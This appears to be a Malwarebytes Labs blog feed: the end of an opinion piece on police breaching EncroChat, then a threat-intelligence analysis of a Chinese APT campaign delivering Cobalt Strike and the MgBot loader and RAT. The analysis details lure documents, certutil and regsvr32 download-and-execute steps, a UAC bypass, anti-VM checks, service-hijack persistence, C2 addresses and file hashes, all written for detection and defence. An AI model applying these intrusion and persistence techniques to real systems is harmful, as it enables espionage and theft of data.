Dutch law enforcement’s ability to breach EncroChat supports our point that the police don’t need built-in backdoors to catch criminals. Governments have asked for both means of observing data in transit, as well as retrieving data at rest on devices of interest. Looking at this case, we doubt that criminals would have chatted so freely about their activities had they known there was a backdoor—or even the capability of a backdoor—somewhere in the system.

But providing law enforcement with free access into platforms of their choosing is a slippery slope. For one, hacking into a secure platform puts all users’ information in jeopardy. Despite the intel on criminal activity in EncroChat, there are still legitimate users whose private messages are now compromised. In addition, where should law enforcement draw the line? How many other encryption platforms will they compromise before users have nowhere to turn? And at what point will law enforcement make an assumption of guilt just because someone is using encrypted chat?

Time and again law enforcement agencies have demonstrated that even if they can’t keep up with every new security development, at some point they catch up and find a way around it. And when they do, the harvest is huge. In this case, police departments will have years of investigating ahead of them if they plan to follow up on the millions of messages they intercepted. They may also find that because of their means of access, many data points may be inadmissible in court.

Thankfully, breaking encryption is not easy, especially when the encryption routine is without flaw. And these flaws will be a rare find when it comes to algorithms with track records like PGP and OTR. Finding a way to break the encryption will depend on a flaw in the implementation. Or finding a way to intercept messages before the encryption on the sender’s end or after the encryption on the receiver’s end.

Our hope is that law enforcement exhaust all other avenues of reconnaissance and investigation before moving to put the privacy of an entire platform of users in jeopardy. For now, legitimate users of end-to-end encryption programs needn’t worry about their company secrets or other confidential whisperings getting out. But for the potentially thousands of criminal EncroChat users that haven’t been arrested yet—time to worry.

The post EncroChat system eavesdropped on by law enforcement appeared first on Malwarebytes Labs.

Chinese APT group targets India and Hong Kong using new variant of MgBot malware

This blog post was authored by Hossein Jazi and Jérôme Segura

On July 2, we found an archive file with an embedded document pretending to be from the government of India. This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike.

One day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.

On July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK’s prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.

Considering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.

Active targeting with different lures

We were able to track the activities related to these threat actors over the succession of several days based on unique phishing attempts designed to compromise their target.

‘Mail security check’ with Cobalt Strike (variant 1)

This campaign was most likely carried out through spear phishing emails. The .rar file (Mail security check.rar) includes a document with the same name (Figure 1).

mailsecuritycheck 1
Figure 1: Mail security check.docx

The document uses template injection to download a remote template from the following URL (Figure 2).

remoteTemplate 1
Figure 2: Template injection

The downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document’s content (Figure 3).

dde 1
Figure 3: Encoded command

After decoding, we can see the list of commands that will be executed by DDE:

dde decoded 1
Figure 4: Decoded commands

As Figure 4 shows, the threat actors used certutil with -urlcache -split -f parameters to download a com scriptlet from its server and then used the Squiblydoo technique to execute the downloaded scriptlet via regsvr32.exe on the victim machine.

This scriptlet is stored in the Documents directory as “ff.sct”. The scriptlet is an XML file that has embedded VBscript (Figure 5).

sct file 1
Figure 5: ff.sct snipplet

The scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanism and is responsible for injecting the embedded payload into rundll32.exe using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike.

The following diagram shows the overall process of this attack:

Screen Shot 2020 07 07 at 12.29.43 PM
Figure 6: Overall process

‘Mail security check’ with MgBot (variant 2)

As we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload.

Figure 7 shows the new encoded commands embedded within the template file.

dde 2 1
Figure 7: Encoded command

Figure 8 shows the list of commands that will be executed by DDE.

dde decoded 2 1
Figure 8: Decoded commands

In this new template file, the storm.sct scriptlet was replaced with storm.txt. Similar to the previous version, certutil is used to download the storm.txt file which is an executable stored in the Documents directory as ff.exe.

The following diagram shows the overall execution process:

Screen Shot 2020 07 07 at 12.30.07 PM
Figure 9: Overall execution process

“Boris Johnson Pledges to Admit 3 Million From Hong Kong” with MgBot (variant 3)

The last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named “Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar”.

This document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10).

boris 1
Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.

Similar to the other documents, it also uses template injection to download the remote template (Figure 11).

remoteTemplteBoris 1
Figure 11: Remote template

The downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in which it uses DDE to download and drop its loader.

Payload analysis: MgBot (BLame, Mgmbot)

The dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. This loader pretends to be a Realtek Audio Manager tool (Figure 12).

Screen Shot 2020 07 07 at 5.07.25 PM 300x115 1
Figure 12: File version information

It has four embedded resources in which two of them are in Chinese Simplified language. This is an indicator that suggests this campaign is likely operated by a Chinese APT group.

Screen Shot 2020 07 07 at 5.07.58 PM 2
Figure 13: Resource language

The loader starts its process by escalating privilege through a UAC bypass using the CMSTPLUA COM interface.

MgBot uses several anti-analysis and anti-virtualization techniques. The code is self modifying which means it alters its code sections during runtime. This makes static analysis of the sample harder.

MgBot tries to avoid running in known virtualized environment such as VmWare, Sandboxie and VirtualBox. To identify if it’s running in one of these environments, it looks for the following DLL files: vmhgfs.dll, sbiedll.dll and vboxogl.dll and if it finds any of these DLLs, it goes to an infinite loop without doing any malicious activity (Figure 14).

virutalizationChecks 1
Figure 14: Anti-VMs

It also checks for the presence of security products on the victim’s machine and takes a different execution flow if a security product is detected. For example, it checks for zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe and McUICnt.exe in different parts of the code (Figure 15). The malware does not perform all the checks at once and it rather checks a couple of them at different steps of its execution.

av 1
Figure 15: Security products checks

To invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each request to an API call is made through the access to the relevant index of this table.

apis 1
Figure 16: Building function pointer table

As an example, when the malware needs to invoke WinExec, it does so by invoking it through its index from the function pointer table.

winexec 1
Figure 17: Calling API through use of function pointer table

After building the required API calls table, the malware performs the following procedures:

  • It calls CreateFileW to create iot7D6E.tmp (random name starting with iot) into the %APPDATA%Temp directory. This tmp file is a cab file that embedds the final payload.
  • It calls WriteFile to populate its content
  • It calls CreateProcessInternalW to invoke expand.exe to decompress the content of iot7D6E.tmp into ProgramDataMicrosoftPlayReadyMSIBACF.tmptmp.dat (the MSIBACF.tmp directory name is generated randomly and starts with MSI and then is followed by a combination of random numbers and characters)
expand 1
Figure 18: Calling expand.exe
  • It calls CopyFileW to copy tmp.dat into pMsrvd.dll
  • It calls DeleteFileW to delete tmp.dat
  • It drops DBEngin.EXE and WUAUCTL.EXE in the ProgramDataMicrosoftPlayReady directory. Both of these files are rundll32.exe that is used later to execute the dropped DLL.
  • It modifies the registry hive of of HKLMSYSTEMCurrentControlSetServicesAppMgmt registry location to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers have been added to iix) into the %APPDATA%Temp directory which are the old and new registry hives for the mentioned registry location.

To load the dropped DLL (pMsrvd.dll) the loader registers it as a service. To achieve this, it makes use of the already installed service, AppMgmt, to load the payload as shown in the following images:

reg2new 1
Figure 18: ServiceDll
regnew1 1
Figure 19: ImagePath

Finally, it executes the dropped DLL by running net start AppMgmt. After loading the DLL, the Loader creates a cmd file (lgt*.tmp.cmd) in the %APPDATA%TEMP directory with the content shown in Figure 20. Then it executes it to delete the cmd file and loader from the victim’s machine.

cmdnew 1
Figure 20: cmd file

We were able to identify several different variants of this loader. In general, all the variants drop the final payload using expand.exe or extrac32.exe and then use “net start AppMgmt” or “net start StiSvc” to execute the dropped DLL with one of the following configurations:

  • svchost.exe -k netsvcs -p -s AppMgmt
  • svchost.exe -k netsvcs
  • svchost.exe -k imgsvc

The dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows the file version information pretending to be a Video Team Desktop App.

Screen Shot 2020 07 13 at 4.05.06 PM 1
Figure 21: File info

The creation time for this DLL appears to be “2008-04-26 16:41:12”. However, based on Rich header data, we can assert that this might have been tampered with by the threat actor.

rich header 1
Figure 22: Rich header

The DLL has eight export functions with carefully selected names to pretend they are doing normal tasks. It can check the running services and based on that can inject itself into the memory space of WmiPrvSE.exe.

wmicode 1
Figure 23: Injection into WmiPrvse.exe
wmi 1
Figure 24: RAT’s DLL is injected into memory space of WmiPrvse.exe

It uses several anti-debugging and anti-virtualization techniques to detect if it’s running in a virtualized environment or if it is being debugged by a debugger. It uses GetTickCount and QueryPerformanceCounter API calls to detect the debugger environment.

To detect if it is running in a virtual environment, it uses anti-vm detection instructions such as sldt and cpid that can provide information about the processor and also checks Vmware IO ports (VMXH).

type 510x600 1
Figure 25: Environment Detection

All the strings used by this RAT are either obfuscated or XOR encoded to make its analysis hard.

This final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities such as:

  • C2 communication over TCP (42.99.116[.]225:12800)
  • Ability to take screenshots
  • Keylogging
  • File and directory management
  • Process management
  • Create MUTEX

Infrastructure relations

The following shows the infrastructure used by this APT and relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.

What is interesting is that the majority of IP addresses used by this APT are located in Hong Kong and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they mostly have used infrastructure in Hong Kong. The graph also shows the relationship between different IP addresses used by this APT group.

VT 1 1
Figure 26: Infrastructure connections

Android RAT

We also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as Android/Trojan.Spy.AndroRat.KSRemote.

android 1
Figure 27: Malicious Android APK

All these bogus applications contain a jar file named ksremote.jar that provides the RAT functionality:

  • Recording screen and audio using the phone’ss camera/mic
  • Locating phone with coordinates
  • Stealing phone contacts, call log, SMS, web history
  • Sending SMS messages
contacts 1
Figure 28: Contact grabbing capability

This RAT communicates with C&C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong)

  • 122.10.89[.]172:10560
  • 122.10.89[.]170:9552
  • 122.10.89[.]172:10560

TTPs in line with Chinese APTs

The lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.

The TTPs observed in these attacks have been used by several Chinese APT groups:

  • Rancor APT is known to use Certutil to download their payload
  • KeyBoy is known to have used DDE is its previous campaigns
  • APT40 has utilized Squiblydoo and template injection in its previous campaigns.

Considering these factors we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group we were able to track back its activities to at least 2014. In all their campaigns the actor has used a variant of MgBot.

A threat actor with a long documented history

A Needle in a haystack blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used CVE-2012-0158 to drop its Trojan. The rest of the TTPs including the methods used by the threat actor to execute MgBot and registry modifications are similar to this ongoing campaign.

In 2018, this group performed another operation in which they used a VBScript vulnerability (CVE-2018-8174) to initiate their attack to drop a variants of MgBot. In March 2020, an archive file (warning.rar) was submitted to VirusTotal that we believe is part of another campaign used by this actor.

We will continue this group’s activities to see if their targeting or techniques evolve. Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.

nebula
Figure 29: Malwarebytes Nebula blocking malicious Word document

MITRE ATT&CK techniques

Tactic ID Name Details
Execution T1059 Command-Line Interface Starts CMD.EXE for commands execution
 T1106 Execution through Module Load Loads dropped or rewritten executable
– WUAUCTL.EXE
–  svchost.exe
–  rundll32.exe
 T1053 Rundll32 Uses RUNDLL32.EXE to load library
 T1064 Scripting WScript.exe: Starts MSHTA.EXE for opening HTA or HTMLS files
 T1035 service execution Starts NET.EXE for service management
T1170  mshta Starts MSHTA.EXE for opening HTA or HTMLS files
T1086 PowerShell  Executes PowerShell scripts
Privilege Escalation T1050 new service Creates or modifies windows services through rundll32.exe
 T1088 Bypass UAC Known privilege escalation attack through  DllHost.exe
Persistence T1031 Modify Existing Service Creates or modifies windows services through rundll32.exe
T1050 new services Creates or modifies windows services through rundll32.exe
Defense Evasion T1107 File Deletion Starts CMD.EXE for self-deleting
 T1085  Rundll32 Uses RUNDLL32.EXE to load library
T1088 bypass UAC Known privilege escalation attack through  DllHost.exe
T1497 Virtualization/Sandbox Evasion The Loader uses several anti-virtualization detections techniques
T1221 Template Injection Maldoc uses template injection to download remote template
T1218 Signed Binary Proxy Execution Use Squiblydoo to load executable
Discovery T1012 Query Registry  Reads the machine GUID from the registry
T1082 System Information Discovery  Reads the machine GUID from the registry
T1007 System Service Discovery Starts NET.EXE for service management
Lateral Movement T1105 Remote File Copy – certutil.exe: Downloads executable files from the Internet
– cmd.exe: Starts CertUtil for downloading files
C&C T1105 Remote File Copy – certutil.exe: Downloads executable files from the Internet
 – cmd.exe: Starts CertUtil for downloading files
Table 1: Mitre Attack TTPs

IOCs

2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx

fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc BNOHK.docx.zip

3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790 Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar

ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03 Email security check.rar

1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6 Email security check.docx

3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b ADIN.docx (storm.sct)

855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8 ADIN.docx (storm.sct)

1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 ff.exe (storm.txt)

99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a cobalt strike

flash.governmentmm.com: This domain used by actor to host remote templates. It has been registered 3 month ago by someone in United States.

MgBot samples

2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0
e224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468
5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f
1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585
07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f
7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6
8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4
f41bfc57c2681d94bf102f39d4af022beddafb4d49a49d7d7c1901d14eb698d2

45.77.245[.]0: This IP has been used by Cobalt Strike as a C&C server.

42.99.116[.]225: C&C server used by final Payload.

Android samples

b5304a0836baf1db8909128028793d12bd418ff78c69dc6f9d014cadede28b77
9aade1f7a1f067688d5da9e9991d3a66799065ffe82fca7bb679a71d89fec846
5f7f87db34340ec83314313ec40333aebe6381ef00b69d032570749d4cedee46

The post Chinese APT group targets India and Hong Kong using new variant of MgBot malware appeared first on Malwarebytes Labs.